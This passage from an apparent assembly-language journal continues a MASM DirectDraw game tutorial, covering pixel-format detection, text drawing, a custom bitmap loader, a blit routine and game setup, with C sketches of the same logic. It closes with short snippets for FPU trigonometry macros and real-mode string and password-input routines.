to land in its proper place within the pixel. For example, in 5-6-5 mode
the masks are 0F800h for red, 07E0h for green, and 001Fh for blue, so the
positions are 11, 5, and 0. We find a position by AND'ing the mask with the
number one and, for as long as the result is zero, shifting the mask to the
right by 1 and incrementing a counter. This works because the mask contains
a 1 wherever a bit belongs to the component. AND'ing with the number one
leaves only the lowest bit and turns all others off, so the loop stops as
soon as the lowest set bit of the mask has reached bit 0, and the counter
then holds the number of bits we need to shift by.

Finally, we set a variable that tells us whether the video mode is 5-5-5
or 5-6-5. In 5-5-5 mode the red component starts at bit 10, and in 5-6-5
mode it starts at bit 11, which is why the code tests pRed against 10. This
is extremely important since 16 bpp mode can be either, and we do not want
our pictures to have a green or purple tint on one machine and look fine on
another one!
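
If you think more easily in C than in MASM, here is a minimal sketch of the
same mask logic. It is in C only so that it can be compiled and run without
the Windows toolchain. The names mask_shift() and is_555() are made up for
this illustration and are not part of the library.

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical helper: position of the lowest set bit in a channel mask.
   Same idea as the .WHILE loops above: test bit 0, shift right, count. */
unsigned mask_shift(uint32_t mask)
{
    unsigned count = 0;

    assert(mask != 0);          /* a zero mask would never terminate */
    while ((mask & 1u) == 0) {
        mask >>= 1;
        count++;
    }
    return count;
}

/* Hypothetical helper: a 16 bpp mode is 5-5-5 when red starts at bit 10. */
int is_555(uint32_t red_mask)
{
    return mask_shift(red_mask) == 10;
}
```

With the 5-6-5 masks 0xF800, 0x07E0 and 0x001F, mask_shift() gives 11, 5
and 0. With the 5-5-5 red mask 0x7C00 it gives 10, so is_555() reports
true. Note the assert: a mask of zero (for instance from a failed call)
would make a loop like this spin forever.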

The last function that I want to cover in our Direct Draw library is the
text drawing function. This uses GDI, so I figured I should at least give
it a small explanation. The code ...


;########################################################################
; DD_Draw_Text Procedure
;########################################################################
DD_Draw_Text    PROC    surface:DWORD, text:DWORD, num_chars:DWORD,
                                 x:DWORD, y:DWORD, color:DWORD

         ;=======================================================
         ; This function will draw the passed text on the passed
         ; surface using the passed color at the passed coords
         ; with GDI
         ;=======================================================

         ;===========================================
         ; First we need to get a DC for the surface
         ;===========================================
         DDS4INVOKE GetDC, surface, ADDR hDC

         ;===========================================
         ; Set the text color and BK mode
         ;===========================================
         INVOKE SetTextColor, hDC, color
         INVOKE SetBkMode, hDC, TRANSPARENT

         ;===========================================
         ; Write out the text at the desired location
         ;===========================================
         INVOKE TextOut, hDC, x, y, text, num_chars

         ;===========================================
         ; release the DC we obtained
         ;===========================================
         DDS4INVOKE ReleaseDC, surface, hDC

done:
         ;===================
         ; We completed
         ;===================
         return TRUE

DD_Draw_Text ENDP
;########################################################################
; END DD_Draw_Text
;########################################################################


Following this code is relatively simple. First, we get the Device Context
for our surface. In Windows, drawing is typically done through these DCs
(Device Contexts), so if you want to use any GDI function in Direct Draw,
the first thing you have to do is get the DC for your surface. Then, we set
the text color and background mode using basic Windows GDI calls. Now we
are ready to draw our text ... again, we just make a call to the Windows
function TextOut(). There are many others; this is just the one that I
chose to use. Finally, we release the DC for our surface.

The rest of the Direct Draw routines follow the same basic format and use
the same types of calls, so they shouldn't be too hard to figure out. The
basic idea behind all of the routines is the same: encapsulate the
functionality we need into some services that still allow us to be
flexible. Now, we need to write the code to handle our bitmaps that go into
these surfaces.


Our Bitmap Library
------------------
We are now ready to write our bitmap library. We will start, like the
Direct Draw library, by determining what we need. As far as I can tell
right now, we should be good with two simple routines: a bitmap loader and
a draw routine. Since we will be using surfaces, the draw routine should
draw onto the passed surface. Our loader will load our special file format,
which I will cover in a moment. That should be it; there isn't that much
that is needed for bitmaps nowadays. DirectX is how most manipulation
occurs, especially since many things can be done in hardware. With that in
mind, we will cover our unique file format.

Normally, creating your own file format is a headache and isn't worth the
trouble. However, in our case it greatly simplifies the code, and I have
provided the conversion utility with the download package. This format is
probably one of the easiest you will ever encounter. It has five main
parts: Width, Height, BPP, Size of Buffer, and Buffer. The first three give
information on the image. I have our library set up for 16 bpp only, but
implementing other bit depths would be fairly easy. The fourth section
tells us how large of a buffer we need for the image, and the fifth section
is that buffer. Having our own format not only makes the code we need to
write a lot easier, it also prevents other people from seeing our work
before they were meant to see it! Now, how do we load this bad boy?


;########################################################################
; Create_From_SFP Procedure
;########################################################################
Create_From_SFP PROC    ptr_BMP:DWORD, sfp_file:DWORD, desired_bpp:DWORD

         ;=========================================================
         ; This function will allocate our bitmap structure and
         ; will load the bitmap from an SFP file. Converting if
         ; it is needed based on the passed value.
         ;=========================================================

         ;=================================
         ; Local Variables
         ;=================================
         LOCAL hFile     :DWORD
         LOCAL hSFP      :DWORD
         LOCAL Img_Left  :DWORD
         LOCAL Img_Alias :DWORD
         LOCAL red       :DWORD
         LOCAL green     :DWORD
         LOCAL blue      :DWORD
         LOCAL Dest_Alias :DWORD

         ;=================================
         ; Open the SFP file
         ;=================================
         INVOKE CreateFile, sfp_file, GENERIC_READ,FILE_SHARE_READ, \
                 NULL,OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL,NULL
         MOV     hFile, EAX

         ;===============================
         ; Test for an error
         ;===============================
         .IF EAX == INVALID_HANDLE_VALUE
                 ; Nothing has been allocated yet, so
                 ; return without going through err
                 return FALSE
         .ENDIF

         ;===============================
         ; Get the file size
         ;===============================
         INVOKE GetFileSize, hFile, NULL
         PUSH    EAX

         ;================================
         ; test for an error
         ;================================
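         .IF EAX == -1
                 ; hSFP is not allocated yet, so close
                 ; the file and return directly
                 INVOKE CloseHandle, hFile
                 return FALSE
         .ENDIF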

         ;==============================================
         ; Allocate enough memory to hold the file
         ;==============================================
         INVOKE GlobalAlloc, GMEM_FIXED, EAX
         MOV     hSFP, EAX

         ;===================================
         ; test for an error
         ;===================================
         .IF EAX == 0
                 JMP err
         .ENDIF

         ;===================================
         ; Put the file into memory
         ;===================================
         POP     EAX
         INVOKE ReadFile, hFile, hSFP, EAX, OFFSET Amount_Read, NULL

         ;====================================
         ; Test for an error
         ;====================================
         .IF EAX == FALSE
                 ;========================
                 ; We failed so leave
                 ;========================
                 JMP err

         .ENDIF

         ;===================================
         ; Determine the size without the BPP
         ;===================================
         MOV     EBX, hSFP
         MOV     EAX, DWORD PTR [EBX]
         ADD     EBX, 4
         MOV     ECX, DWORD PTR [EBX]
         MUL     ECX
         PUSH    EAX

         ;======================================
         ; Do we allocate a 16 or 24 bit buffer
         ;======================================
         .IF desired_bpp == 16
                 ;============================
                 ; Just allocate a 16-bit
                 ;============================
                 POP     EAX
                 SHL     EAX, 1
                 INVOKE GlobalAlloc, GMEM_FIXED, EAX
                 MOV     EBX, ptr_BMP
                 MOV     DWORD PTR [EBX], EAX
                 MOV     Dest_Alias, EAX

                 ;====================================
                 ; Test for an error
                 ;====================================
                 .IF EAX == FALSE
                         ;========================
                         ; We failed so leave
                         ;========================
                         JMP err

                 .ENDIF

         .ELSE
                 ;========================================
                 ; This is where code for 24 bit would go
                 ;========================================

                 ;============================
                 ; For now just return an err
                 ;============================
                 JMP err

         .ENDIF

         ;====================================
         ; Setup for reading in
         ;====================================
         MOV     EBX, hSFP
         ADD     EBX, 10
         MOV     EAX, DWORD PTR[EBX]
         MOV     Img_Left, EAX
         ADD     EBX, 4
         MOV     Img_Alias, EBX

         ;====================================
         ; Now lets start converting values
         ;====================================
         .WHILE Img_Left > 0
                 ;==================================
                 ; Build a color word based on
                 ; the desired BPP or transfer
                 ;==================================
                 .IF desired_bpp == 16
                         ;==========================================
                         ; Read in a byte for blue, green and red
                         ;==========================================
                         XOR     ECX, ECX
                         MOV     EBX, Img_Alias
                         MOV     CL, BYTE PTR [EBX]
                         MOV     blue, ECX
                         INC     EBX
                         MOV     CL, BYTE PTR [EBX]
                         MOV     green, ECX
                         INC     EBX
                         MOV     CL, BYTE PTR [EBX]
                         MOV     red, ECX

                         ;=======================
                         ; Adjust the Img_Alias
                         ;=======================
                         ADD     Img_Alias, 3

                         ;================================
                         ; Do we build a 555 or a 565 val
                         ;================================
                         .IF Is_555 == TRUE
                                 ;============================
                                 ; Build the 555 color word
                                 ;============================
                                 RGB16BIT_555 red, green, blue
                         .ELSE
                                 ;============================
                                 ; Build the 565 color word
                                 ;============================
                                 RGB16BIT_565 red, green, blue

                         .ENDIF

                         ;================================
                         ; Transfer it to the final buffer
                         ;================================
                         MOV     EBX, Dest_Alias
                         MOV     WORD PTR [EBX], AX

                         ;============================
                         ; Adjust the dest by 2
                         ;============================
                         ADD     Dest_Alias, 2

                 .ELSE
                         ;========================================
                         ; This is where code for 24 bit would go
                         ;========================================

                         ;============================
                         ; For now just return an err
                         ;============================
                         JMP err

                 .ENDIF

                 ;=====================
                 ; Sub amount left by 3
                 ;=====================
                 SUB     Img_Left, 3

         .ENDW

         ;====================================
         ; Free the SFP memory and close
         ; the file handle we opened
         ;====================================
         INVOKE GlobalFree, hSFP
         INVOKE CloseHandle, hFile

done:
         ;===================
         ; We completed
         ;===================
         return TRUE

err:
         ;====================================
         ; Free the SFP Memory
         ;====================================
         INVOKE GlobalFree, hSFP

         ;===================
         ; We didn't make it
         ;===================
         return FALSE

Create_From_SFP ENDP
;########################################################################
; END Create_From_SFP
;########################################################################


The code starts out by calling CreateFile(), which, despite its name, is
how you open an existing file in Windows, and then retrieves the file size.
This allows us to allocate enough memory to load our entire file in. The
process of reading in the file is fairly simple: we just make a call. As
usual, the most important parts are those that check for errors.

Once the file is in memory we compute the size of the desired image based
upon the width and height in our header, and the "desired_bpp" level that
was passed in to the function. Then we allocate yet another buffer with the
information we calculated. This is the buffer that is kept in the end.
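
To make the header layout concrete, here is a rough C sketch of how the
fields could be picked out of the loaded file. The offsets are inferred
from the loader above (width at 0, height at 4, buffer size at 10, pixels
at 14). The 2-byte BPP field at offset 8 is my assumption, based only on
the gap between the height and the buffer size. The SfpHeader type and all
function names are hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Offsets inferred from the loader; the BPP width is an assumption. */
enum {
    SFP_OFF_WIDTH  = 0,
    SFP_OFF_HEIGHT = 4,
    SFP_OFF_BPP    = 8,
    SFP_OFF_SIZE   = 10,
    SFP_OFF_PIXELS = 14
};

typedef struct {
    uint32_t width;
    uint32_t height;
    uint16_t bpp;
    uint32_t data_size;      /* bytes of pixel data after the header */
    const uint8_t *pixels;   /* points into the caller's file buffer */
} SfpHeader;

/* Read little-endian values byte by byte so alignment never matters. */
uint32_t read_u32le(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

uint16_t read_u16le(const uint8_t *p)
{
    return (uint16_t)(p[0] | (p[1] << 8));
}

/* Returns 1 on success, 0 if the buffer is too small for what it claims. */
int sfp_parse(const uint8_t *file, size_t file_len, SfpHeader *out)
{
    assert(file != NULL && out != NULL);
    if (file_len < SFP_OFF_PIXELS)
        return 0;

    out->width     = read_u32le(file + SFP_OFF_WIDTH);
    out->height    = read_u32le(file + SFP_OFF_HEIGHT);
    out->bpp       = read_u16le(file + SFP_OFF_BPP);
    out->data_size = read_u32le(file + SFP_OFF_SIZE);
    out->pixels    = file + SFP_OFF_PIXELS;

    if (out->data_size > file_len - SFP_OFF_PIXELS)
        return 0;
    return 1;
}

/* Bytes needed for the converted 16 bpp image: width * height * 2. */
size_t sfp_size_16bpp(const SfpHeader *h)
{
    return (size_t)h->width * h->height * 2u;
}
```

The last function is the C twin of the MUL followed by SHL EAX, 1 in the
loader. The extra length checks are not in the assembly version; I added
them here because a sketch that trusts the file blindly is a bad habit to
copy.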

The next step is the heart of our load function. Here we read in 3 bytes,
since our pictures are stored as 24-bit images, and create the proper color
value ( 5-6-5 or 5-5-5 ) for the buffer. We then store that value in the
new buffer that we just created. We loop through all pixels in our bitmap
and convert each to the desired format. The conversion is based on a
pre-defined macro. You could also implement the function by using the
globals we filled in when we called the function to get the pixel format.
This second way would allow you to have a more abstract interface to the
code ... but for our purposes it was better to see what was really
happening to the bits.
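
Here is a small C sketch of what happens to the bits during the
conversion. I am assuming the RGB16BIT_555 and RGB16BIT_565 macros simply
keep the top bits of each 8-bit channel, which is the usual way to do it;
their actual definitions live in the include file and are not shown here.
The function names are hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Keep the top 5 bits of each 8-bit channel: 0RRRRRGG GGGBBBBB. */
uint16_t pack_555(uint8_t r, uint8_t g, uint8_t b)
{
    return (uint16_t)(((r >> 3) << 10) | ((g >> 3) << 5) | (b >> 3));
}

/* Green keeps 6 bits here: RRRRRGGG GGGBBBBB. */
uint16_t pack_565(uint8_t r, uint8_t g, uint8_t b)
{
    return (uint16_t)(((r >> 3) << 11) | ((g >> 2) << 5) | (b >> 3));
}

/* Convert src_len bytes of blue, green, red triples into 16-bit pixels.
   dst must have room for src_len / 3 entries. Returns pixels written. */
size_t convert_bgr24(const uint8_t *src, size_t src_len,
                     uint16_t *dst, int is_555)
{
    size_t n = 0;

    assert(src != NULL && dst != NULL);
    while (src_len >= 3) {      /* stops cleanly on a partial last pixel */
        uint8_t b = src[0], g = src[1], r = src[2];
        dst[n++] = is_555 ? pack_555(r, g, b) : pack_565(r, g, b);
        src += 3;
        src_len -= 3;
    }
    return n;
}
```

Pure red comes out as 0x7C00 in 5-5-5 and as 0xF800 in 5-6-5, which is
exactly why a picture packed for one format looks tinted when displayed in
the other.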

At the completion of our loop we free the file buffer, and the caller is
left with the address of the buffer holding our converted pixel values,
which was stored through ptr_BMP. If an error occurs along the way, we jump
to our error code, which frees the file buffer we may have created. This is
to prevent memory leaks. And ... that is it for the load function.
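
The "one cleanup path" idea is worth a closer look, so here is a minimal
sketch of it in portable C, using stdio in place of the Win32 file calls.
The function load_file() is hypothetical. The important detail is that
every resource starts out as "not acquired", so the cleanup code is safe
to run no matter where the failure happened.

```c
#include <assert.h>
#include <stdio.h>
#include <stdlib.h>

/* Hypothetical helper: read a whole file into a malloc'd buffer.
   Returns the buffer (caller frees it) or NULL on any failure.
   An empty file is treated as a failure in this sketch. */
unsigned char *load_file(const char *path, size_t *out_len)
{
    FILE *fp = NULL;            /* start every resource as "not acquired" */
    unsigned char *buf = NULL;
    unsigned char *result = NULL;
    long size;

    assert(path != NULL && out_len != NULL);

    fp = fopen(path, "rb");
    if (fp == NULL)
        goto cleanup;
    if (fseek(fp, 0, SEEK_END) != 0)
        goto cleanup;
    size = ftell(fp);
    if (size <= 0 || fseek(fp, 0, SEEK_SET) != 0)
        goto cleanup;

    buf = malloc((size_t)size);
    if (buf == NULL)
        goto cleanup;
    if (fread(buf, 1, (size_t)size, fp) != (size_t)size)
        goto cleanup;

    *out_len = (size_t)size;
    result = buf;               /* success: hand the buffer to the caller */
    buf = NULL;                 /* ...so the cleanup below must not free it */

cleanup:
    free(buf);                  /* free(NULL) is a no-op */
    if (fp != NULL)
        fclose(fp);
    return result;
}
```

The same discipline carries over to assembly: zero your handle variables
before the first call that can fail, and the err label can test each one
before releasing it.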

Once the bitmap is loaded into memory we need to be able to draw it onto a
Direct Draw surface. Whether we are loading it in there permanently, or
just drawing a quick picture onto the back buffer, should not matter. So,
we will look at a function that draws the passed bitmap onto our passed
surface. Here is the code:


;########################################################################
; Draw_Bitmap Procedure
;########################################################################
Draw_Bitmap PROC surface:DWORD, bmp_buffer:DWORD, lPitch:DWORD, bpp:DWORD

         ;=========================================================
         ; This function will draw the BMP on the surface.
         ; the surface must be locked before the call.
         ;
         ; It uses the width and height of the screen to do so.
         ; I hardcoded this in just 'cause ... okay.
         ;
         ; This routine does not do transparency!
         ;=========================================================

         ;===========================
         ; Local Variables
         ;===========================
         LOCAL dest_addr :DWORD
         LOCAL source_addr :DWORD

         ;===========================
         ; Init the addresses
         ;===========================
         MOV     EAX, surface
         MOV     EBX, bmp_buffer
         MOV     dest_addr, EAX
         MOV     source_addr, EBX

         ;===========================
         ; Init counter with height
         ;
         ; Hard-coded in.
         ;===========================
         MOV     EDX, 480

         ;=================================
         ; We are in 16 bit mode
         ;=================================

copy_loop1:
         ;=============================
         ; Setup num of DWORDs in width
         ;
         ; Hard-coded also.
         ;
         ; 640*2/4 = 320.
         ;=============================
         MOV     ECX, 320

         ;=============================
         ; Set source and dest
         ;=============================
         MOV     EDI, dest_addr
         MOV     ESI, source_addr

         ;======================================
         ; Move by DWORDS
         ;======================================
         REP movsd

         ;==============================
         ; Adjust the variables
         ;==============================
         MOV     EAX, lPitch
         MOV     EBX, 1280
         ADD     dest_addr, EAX
         ADD     source_addr, EBX

         ;========================
         ; Dec the line counter
         ;========================
         DEC     EDX

         ;========================
         ; Did we hit bottom?
         ;========================
         JNE copy_loop1


done:
         ;===================
         ; We completed
         ;===================
         return TRUE

err:
         ;===================
         ; We didn't make it
         ;===================
         return FALSE

Draw_Bitmap ENDP
;########################################################################
; END Draw_Bitmap
;########################################################################


This function is a little bit more advanced than some of the others we
have seen, so pay attention. We know, as assembly programmers, that if we
can get everything into a register things will be faster than if we had to
access memory. So, in that spirit, the copy itself runs out of registers:
at the top of every line we load the destination address into EDI and the
source address into ESI.

Then, we compute the number of WORDS in our line. We can then divide this
number by 2, so that we have the number of DWORDS in a line. I have
hard-coded this number in since we will always be in 640 x 480 x 16 for our
game. Once we have this number we place it in the register ECX. The reason
for this is that our next instruction, MOVSD, can be combined with the REP
prefix. This will move a DWORD from the address in ESI to the address in
EDI, advance both registers by 4, decrement ECX by 1, and repeat until ECX
is equal to zero. In short, it is like having a For loop with the counter
in ECX. As we have the code right now, it moves a DWORD from the source
into the destination until we have exhausted the number of DWORDS in our
line. We then add lPitch to the destination address and 1280, the number of
bytes in a bitmap line, to the source address, and do this over again until
we have reached the number of lines in our height ( 480 in our case ).
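
The reason the two addresses advance by different amounts is easier to see
in a few lines of C. This is only a sketch of the same loop, with the
width and height passed in rather than hard-coded. The function name
blit_rows() is made up for the illustration.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Copy a tightly packed 16 bpp image into a surface whose rows are
   `pitch` bytes apart. The pitch may be larger than width * 2. */
void blit_rows(uint8_t *dest, size_t pitch,
               const uint8_t *src, size_t width, size_t height)
{
    size_t row_bytes = width * 2;       /* 640 * 2 = 1280 in the article */
    size_t y;

    assert(dest != NULL && src != NULL && pitch >= row_bytes);
    for (y = 0; y < height; y++) {
        memcpy(dest, src, row_bytes);   /* the job REP MOVSD does per line */
        dest += pitch;                  /* next surface line */
        src  += row_bytes;              /* next bitmap line  */
    }
}
```

The bitmap in memory has no gaps between its lines, but a surface line can
be followed by padding that the video card wants for alignment. Stepping
the destination by the pitch skips that padding and leaves it untouched.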

Those are our only two functions in the bitmap module. They are short and
sweet. More importantly, now that we have our bitmap and Direct Draw
routines coded we can write the code to display our loading game screen!


A Game ... Well, Kinda'
-----------------------
The library routines are complete and we are now ready to plunge into our
game code. We will start out by looking at the game initialization function
since it is called first in our code.


;########################################################################
; Game_Init Procedure
;########################################################################
Game_Init PROC

         ;=========================================================
         ; This function will setup the game
         ;=========================================================

         ;============================================
         ; Initialize Direct Draw -- 640, 480, bpp
         ;============================================
         INVOKE DD_Init, 640, 480, screen_bpp

         ;====================================
         ; Test for an error
         ;====================================
         .IF EAX == FALSE
                 ;========================
                 ; We failed so leave
                 ;========================
                 JMP err

         .ENDIF

         ;======================================
         ; Read in the bitmap and create buffer
         ;======================================
         INVOKE Create_From_SFP, ADDR ptr_BMP_LOAD, ADDR szLoading, \
                 screen_bpp

         ;====================================
         ; Test for an error
         ;====================================
         .IF EAX == FALSE
                 ;========================
                 ; We failed so leave
                 ;========================
                 JMP err

         .ENDIF

         ;===================================
         ; Lock the DirectDraw back buffer
         ;===================================
         INVOKE DD_Lock_Surface, lpddsback, ADDR lPitch

         ;============================
         ; Check for an error
         ;============================
         .IF EAX == FALSE
                 ;===================
                 ; Jump to err
                 ;===================
                 JMP err

         .ENDIF

         ;===================================
         ; Draw the bitmap onto the surface
         ;===================================
         INVOKE Draw_Bitmap, EAX, ptr_BMP_LOAD, lPitch, screen_bpp

         ;===================================
         ; Unlock the back buffer
         ;===================================
         INVOKE DD_Unlock_Surface, lpddsback

         ;============================
         ; Check for an error
         ;============================
         .IF EAX == FALSE
                 ;===================
                 ; Jump to err
                 ;===================
                 JMP err

         .ENDIF

         ;=====================================
         ; Everything okay so flip displayed
         ; surfaces and make loading visible
         ;======================================
         INVOKE DD_Flip

         ;============================
         ; Check for an error
         ;============================
         .IF EAX == FALSE
                 ;===================
                 ; Jump to err
                 ;===================
                 JMP err

         .ENDIF

done:
         ;===================
         ; We completed
         ;===================
         return TRUE

err:
         ;===================
         ; We didn't make it
         ;===================
         return FALSE

Game_Init ENDP
;########################################################################
; END Game_Init
;########################################################################


This function plays the most important part in our game so far. In this
routine we make the call to initialize Direct Draw. If this succeeds we
load in our "Loading Game" bitmap file from disk. After that we lock the
back buffer. This is very important to do since we will be accessing the
memory directly. After it is locked we can draw our bitmap onto the surface
and then unlock it. The final call in our procedure is to flip the buffers.
Since we have the bitmap on the back buffer, we need it to be visible.
Therefore, we exchange the buffers. The front goes to the back and the back
goes to the front. At the completion of this call our bitmap is visible on
screen. One thing that may be confusing here is why we didn't load the
bitmap into a Direct Draw surface. The reason is that we will only be using
it once, so there was no need to waste a surface.
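
If the idea of flipping is new to you, the toy model below may help. It is
plain C and has nothing to do with the real DirectDraw interfaces, which
leave the actual exchange to the driver and the video hardware. The
FlipChain type and both functions are invented for this illustration. All
it shows is that a flip trades the roles of two buffers without copying a
single pixel.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

enum { FLIP_W = 4, FLIP_H = 2 };    /* tiny stand-in for 640 x 480 */

typedef struct {
    uint16_t a[FLIP_W * FLIP_H];
    uint16_t b[FLIP_W * FLIP_H];
    uint16_t *front;                /* what the "screen" shows */
    uint16_t *back;                 /* what we draw into */
} FlipChain;

void chain_init(FlipChain *c)
{
    assert(c != NULL);
    memset(c->a, 0, sizeof c->a);
    memset(c->b, 0, sizeof c->b);
    c->front = c->a;
    c->back  = c->b;
}

/* Model of the flip: no pixels are copied, the two roles just trade. */
void chain_flip(FlipChain *c)
{
    uint16_t *tmp;

    assert(c != NULL);
    tmp = c->front;
    c->front = c->back;
    c->back  = tmp;
}
```

Whatever was drawn into the back buffer before chain_flip() is what the
front pointer sees afterwards, and the old front buffer becomes the new
place to draw.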

Next on our list of things to code is the Windows callback function itself.
This function is how we handle messages in Windows. Anytime we want to
handle a message the code will go in this function. Take a look at how we
have it set up currently.


;########################################################################
; Main Window Callback Procedure -- WndProc
;########################################################################
WndProc PROC hWin       :DWORD,
                 uMsg    :DWORD,
                 wParam  :DWORD,
                 lParam  :DWORD

.IF uMsg == WM_COMMAND
         ;===========================
         ; We don't have a menu, but
         ; if we did this is where it
         ; would go!
         ;===========================

.ELSEIF uMsg == WM_KEYDOWN
         ;=======================================
         ; Since we don't have a Direct input
         ; system coded yet we will just check
         ; for escape to be pressed
         ;=======================================
         MOV     EAX, wParam
         .IF EAX == VK_ESCAPE
                 ;===========================
                 ; Kill the application
                 ;===========================
                 INVOKE PostQuitMessage,NULL

         .ENDIF

         ;==========================
         ; We processed it
         ;==========================
         return 0

.ELSEIF uMsg == WM_DESTROY
         ;===========================
         ; Kill the application
         ;===========================
         INVOKE PostQuitMessage,NULL
          return 0

.ENDIF

;=================================================
; Let the default procedure handle the message
;=================================================
INVOKE DefWindowProc,hWin,uMsg,wParam,lParam

RET

WndProc endp
;########################################################################
; End of Main Windows Callback Procedure
;########################################################################


The code is fairly self-explanatory. So far we only deal with 2 messages:
the WM_KEYDOWN message and the WM_DESTROY message. We process the
WM_KEYDOWN message so that the user can hit escape and exit our game. We
will be coding a Direct Input system, but until then we needed a way to
quit the game! The one thing you should notice is that any messages we do
not deal with are handled by the "default" processing function --
DefWindowProc(). This function is defined by Windows already. You just need
to call it whenever you do not handle a message.

We aren't going to look at the game main function, simply because it is
empty. We haven't added any solid code to our game loop yet. But,
everything is prepared so that next time we can get to it. That then leaves
us with the shutdown code.


;########################################################################
; Game_Shutdown Procedure
;########################################################################
Game_Shutdown PROC

         ;============================================================
         ; This shuts our game down and frees memory we allocated
         ;============================================================

         ;===========================
         ; Shutdown DirectDraw
         ;===========================
         INVOKE DD_ShutDown

         ;==========================
         ; Free the bitmap memory
         ;==========================
         INVOKE GlobalFree, ptr_BMP_LOAD

done:
         ;===================
         ; We completed
         ;===================
         return TRUE

err:
         ;===================
         ; We didn't make it
         ;===================
         return FALSE

Game_Shutdown ENDP
;########################################################################
; END Game_Shutdown
;########################################################################


Here we make the call to shut down our Direct Draw library, and we also free
the memory we allocated earlier for the bitmap. We could have freed the
memory elsewhere, and maybe next issue we will. But things are a bit easier
to understand when all of your initialization and cleanup code is in one
place.

As you can see, there isn't that much code in our game-specific stuff. The
majority resides in our modules, such as Direct Draw. This keeps our code
clean and makes any later changes much easier, since things aren't hard-coded
inline. Anyway, the end result of what you have just seen is a loading screen
that is displayed until the user hits the escape key. And that ... primitive
though it may be ... is our game thus far.


Until Next Time ...
-------------------
We covered a lot of material in this article. We now have a bitmap library
and a Direct Draw library for our game. These are core modules that you
should be able to use in any game. By breaking up the code like this we are
able to keep our game code separate from the library code. You do not want
any module to be dependent on another module.

In the next article we will continue our module development with Direct
Input. We will also create our menu system. These two things should keep us
busy, and they are what you have to look forward to in the next installment.

Once again young grasshoppers, until next time ... happy coding.

Get the complete source for the game here:

    http://asmjournal.freeservers.com/files/game2.zip



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::................................ASSEMBLY.LANGUAGE.SNIPPETS
                                                    Basic trigonometry functions
                                                    by Eoin O'Callaghan

;Summary:       Basic trigonometry functions not directly supported on the FPU
;               (ArcCos, ArcSin, HSin, HCos and HTan).
;Compatibility: Floating-Point Unit.
;Notes:         None.

.data
         hPi dt 3FFFC90FDAA22168C235h ; tbyte
         iL2e dt 3FFEB17217F7D1CF79ACh ; tbyte
         half dd 0.5

ArcCos MACRO ;Inverse Cosine, st(0) = arccos(st(0))
         fld1
         fld st(1)
         fmul st,st
         fsub
         fsqrt
         fpatan
         fchs
         fld hPi
         fadd
EndM

ArcSin Macro ;Inverse Sine, st(0) = arcsin(st(0))
         fld1
         fld st(1)
         fmul st,st
         fsub
         fsqrt
         fpatan
EndM

HSin Macro ;Hyperbolic Sin, st(0) = hsin(st(0))
         fldl2e
         fmul
         fld st
         frndint
         fsub st(1),st
         fld1
         fscale
         fxch
         fstp st
         fxch
         f2xm1
         fld1
         fadd
         fmul

         fld st
         fld1
         fdivr
         fsub
         fmul half
EndM

HCos Macro ;Hyperbolic Cos, st(0) = hcos(st(0))
         fldl2e
         fmul
         fld st
         frndint
         fsub st(1),st
         fld1
         fscale
         fxch
         fstp st
         fxch
         f2xm1
         fld1
         fadd
         fmul

         fld st
         fld1
         fdivr
         fadd
         fmul half
EndM

HTan Macro ;Hyperbolic Tan, st(0) = htan(st(0))
         fldl2e
         fmul
         fld st
         frndint
         fsub st(1),st
         fld1
         fscale
         fxch
         fstp st
         fxch
         f2xm1
         fld1
         fadd
         fmul

         fmul st,st
         fld st
         fld1
         fadd
         fxch
         fld1
         fsub
         fdivr
EndM


                                                                    getpass
                                                                    by Jake Bush

;Summary:       Get a password type input.
;Compatibility: x86
;Notes:         input:
;                  BX    = Max length to save.
;                  ES:DI = Location to save the input. (Size must be at least
;                          BX + 1).
;               output:
;                  none.

getpass:
         pusha
         xor    cx, cx
.1:     xor    ah, ah
         int    16h
         cmp    al, 0dh
         je    .4
         cmp    cx, 0h
         je    .2
         cmp    al, 8h
         je    .3
.2:     cmp    cx, bx
         je    .1
         cmp    al, 20h
         jb    .1
         stosb
         pusha
         mov    al, '*'
         mov    ah, 0eh
         xor    bh, bh
         mov    cx, 1h
         int    10h
         popa
         inc    cx
         jmp    .1
.3:     dec    di
         dec    cx
         pusha
         mov    al, 8h
         mov    ah, 0eh
         xor    bh, bh
         mov    cx, 1h
         int    10h
         mov    al, ' '
         int    10h
         mov    al, 8h
         int    10h
         popa
         jmp    .1
.4:     mov    al, 0h
         stosb
         popa
         ret


                                                                    strcmp
                                                                    by Jake Bush

;Summary:       Compares two strings.
;Compatibility: x86
;Notes:         input:
;                  DS:SI = String 1.
;                  ES:DI = String 2.
;               output:
;                  CF    = 0 = Equal
;                          1 = Unequal

strcmp:
         pusha
.1:     mov    al, [ds:si]
         mov    ah, [es:di]
         cmp    ah, al
         jne    .2
         cmp    ax, 0h
         je    .3
         inc    si
         inc    di
         jmp    .1
.2:     stc
         jmp    .4
.3:     clc
.4:     popa
         ret


                                                                    strlwr
                                                                    by Jake Bush

;Summary:       Converts all the characters in an ASCIIz string to lower-case.
;Compatibility: x86
;Notes:         input:
;                  DS:SI = Location of the string to convert.
;                  ES:DI = Location to save the converted string.
;               output:
;                  none.

strlwr:
         pusha
.1:     lodsb
         cmp    al, 0h
         je    .3
         cmp    al, 41h          ; below 'A'? leave unchanged
         jb    .2
         cmp    al, 5ah          ; above 'Z'? leave unchanged
         ja    .2
         or    al, 00100000b     ; set bit 5: upper -> lower
.2:     stosb
         jmp    .1
.3:     stosb                    ; AL = 0 here: terminate the copy
         popa
         ret


                                                                    strupr
                                                                    by Jake Bush

;Summary:       Converts all the characters in an ASCIIz string to upper-case.
;Compatibility: x86
;Notes:         input:
;                  DS:SI = Location of the string to convert.
;                  ES:DI = Location to save the converted string.
;               output:
;                  none.

strupr:
         pusha
.1:     lodsb
         cmp    al, 0h
         je    .3
         cmp    al, 61h
         jb    .2
         cmp    al, 7ah
         ja    .2
         xor    al, 00100000b
.2:     stosb
         jmp    .1
.3:     stosb                    ; AL = 0 here: terminate the copy
         popa
         ret



::/ \::::::.
:/___\:::::::.
